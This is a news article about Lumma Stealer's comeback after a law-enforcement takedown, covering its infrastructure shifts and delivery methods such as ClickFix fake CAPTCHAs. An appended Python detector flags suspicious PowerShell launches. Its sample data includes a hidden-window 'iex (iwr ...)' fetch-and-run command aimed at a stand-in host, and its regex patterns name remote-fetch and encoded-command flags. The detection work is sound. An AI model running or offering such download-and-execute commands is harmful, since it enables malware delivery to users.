Lumma Stealer Returns with Active Campaigns Despite Disruption
A resurgence in Lumma Stealer activity has been observed just weeks after a coordinated international takedown in May 2025. According to Trend Micro, while enforcement efforts temporarily disrupted operations, Lumma's operators have since reemerged with new infrastructure, refined delivery tactics, and quieter distribution methods. “Not long after its takedown in May, Lumma Stealer is back. From June to July, the number of targeted accounts began resurging. Now, the malware is distributed with more discreet channels and stealthier evasion tactics.” Notably, the group has moved away from using public underground forums, instead relying on less visible communication channels and alternative infrastructure. Law enforcement had previously seized over 2,300 domains used in Lumma’s command-and-control network and disrupted access to its marketplaces. Despite this, Trend Micro observed Lumma campaigns regaining momentum almost immediately afterward, demonstrating the rapid adaptability of its operators.
The group tracked as “Water Kurita” by Trend Micro confirmed the loss of nearly 2,500 domains, but emphasized that no physical seizure occurred. “According to the developer, while the infrastructure was compromised, law enforcement did not physically confiscate their server as it was located in a jurisdiction outside their reach,” the developer posted following the takedown. Trend Micro noted that law enforcement likely exploited a vulnerability in the server’s Integrated Dell Remote Access Controller (IDRAC), formatting the disks and backups twice. “Instead, authorities allegedly exploited a previously unknown vulnerability, suspected to be in the server’s Integrated Dell Remote Access Controller (IDRAC), to gain access and format all disks, including backups, on two separate occasions.” Despite this effort, Lumma actors swiftly restored access and restructured their infrastructure, transitioning from Cloudflare-heavy hosting to smaller providers such as Selectel. Usage of Cloudflare dropped significantly—from over 200 domains in April and May to fewer than 20 in June and July, while domains hosted on Selectel spiked from 20 in May to 239 in June.
Telemetry from Trend Micro shows Lumma command-and-control (C2) URLs increased sharply in the weeks following the takedown: from just one in late May to more than 450 by mid-June. Campaign activity since the resurgence includes several well-coordinated operations, such as fake crack and keygen tools, malicious GitHub repositories, and the ongoing ClickFix campaign involving fake CAPTCHAs that deceive users into executing PowerShell commands. These methods, combined with social media-driven delivery via YouTube and Facebook, allow Lumma Stealer to reach a broad and unwitting audience. Most recently, GitHub campaigns have used automatically generated repositories featuring AI-generated README files to distribute payloads under file names like “TempSpoofer.exe.” These infection chains often avoid writing files to disk, complicating detection. As Trend Micro observes, the malware continues to be offered as a MaaS (malware-as-a-service), allowing even inexperienced actors to deploy it with ease. Lumma Stealer’s recovery and evolution underscore how quickly cybercriminals can adapt post-takedown.
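The ClickFix pattern described above (a fake CAPTCHA page that talks the user into pasting a PowerShell one-liner into the Run dialog) leaves a recognizable trace in process-creation telemetry even when nothing is written to disk. The detector below is an added example written for this article; it is not Trend Micro's code, and it does not reproduce any Lumma payload. It assumes Sysmon-style field names (`ParentImage`, `Image`, `CommandLine`), assumes that a command pasted into Win+R shows up with `explorer.exe` as the parent process, and scores a handful of common hands-off launch flags; the sample records and the `.invalid` host are constructed for illustration and the base64 blob is a placeholder, not a real encoded command.

```python
"""
Added example (not from the Trend Micro report): score process-creation
records for the ClickFix "paste this into Run" pattern.

Assumptions, not facts from the article:
  * Records carry Sysmon Event ID 1 style fields: ParentImage, Image, CommandLine.
  * A Win+R launch is attributed to explorer.exe as the parent process.
  * Three or more indicators on one record is worth an analyst's time;
    tune the threshold against your own baseline.
"""
import re

RUN_DIALOG_PARENTS = {"explorer.exe"}          # assumed parent of a Run-dialog launch
POWERSHELL_IMAGES = {"powershell.exe", "pwsh.exe"}

# Launch flags and cmdlets that a user would rarely type by hand but a
# pasted one-liner almost always carries.
INDICATORS = {
    "hidden_window":   re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "no_profile":      re.compile(r"-nop(?:rofile)?\b", re.I),
    "encoded_command": re.compile(r"-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "in_memory_exec":  re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "remote_fetch":    re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring)\b", re.I),
}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(event: dict) -> list:
    """Return the names of every indicator that fires on one record (empty for non-PowerShell)."""
    if basename(event["Image"]) not in POWERSHELL_IMAGES:
        return []
    hits = [name for name, rx in INDICATORS.items() if rx.search(event["CommandLine"])]
    if basename(event["ParentImage"]) in RUN_DIALOG_PARENTS:
        hits.append("launched_from_explorer")
    return hits


def detect(events: list, threshold: int = 3) -> list:
    """Return (command line, indicators) for records scoring at or above the threshold."""
    flagged = []
    for event in events:
        hits = score_event(event)
        if len(hits) >= threshold:
            flagged.append((event["CommandLine"], hits))
    return flagged


# Constructed sample telemetry: two ClickFix-style launches, one admin script,
# one interactive shell and one unrelated process.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": "powershell -w hidden -nop -c \"iex (iwr 'http://captcha-check.invalid/v' -UseBasicParsing)\""},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": r"powershell -NoProfile -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     # placeholder base64, decodes to a run of 'A' characters, not a real payload
     "CommandLine": "powershell.exe -nop -w hidden -enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": PS},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for cmdline, hits in detect(SAMPLE_EVENTS):
        print(f"[{len(hits)} indicators] {', '.join(hits)}\n    {cmdline}")
```

Run as-is, only the two explorer-spawned launches carrying hidden-window, no-profile and either an in-memory fetch or an encoded command are reported; the scheduled admin script and the plain interactive shell each score one indicator and stay below the threshold. The explorer.exe parent on its own is deliberately weak evidence (every shortcut-launched console has it), which is why it is combined with the launch flags rather than alerted on alone.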